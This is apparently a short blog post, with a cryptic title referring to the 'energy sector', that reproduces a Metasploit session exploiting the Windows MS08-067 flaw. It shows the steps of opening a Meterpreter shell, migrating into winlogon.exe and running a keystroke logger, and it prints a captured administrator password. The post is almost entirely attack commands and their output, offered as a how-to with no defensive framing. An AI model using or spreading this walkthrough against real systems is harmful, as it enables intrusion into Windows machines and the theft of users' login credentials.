BLACK MASK: 356 smss.exe \SystemRoot\System32\smss.exe (???) energy sector ????

Thursday, June 1, 2017

356 smss.exe \SystemRoot\System32\smss.exe (???) energy sector ????

Capturing Logon Credentials with Meterpreter

======= start code ========

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list
============

PID Name Path
— —- —-
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]

meterpreter > migrate 440
[*] Migrating to 440…
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer…
[ wait for user login ]

meterpreter > keyscan_dump
Dumping captured keystrokes…
Administrator b4mb00hous3

https://rumahbamboo.wordpress.com/category/metasploit/

BLACK MASK

Thursday, June 1, 2017

356 smss.exe \SystemRoot\System32\smss.exe (???) energy sector ????

Capturing Logon Credentials with Meterpreter

No comments:

The Perception of Johnny Punter (The Remasters)

Total Pageviews

Search Webcams:
by www.online-camera.de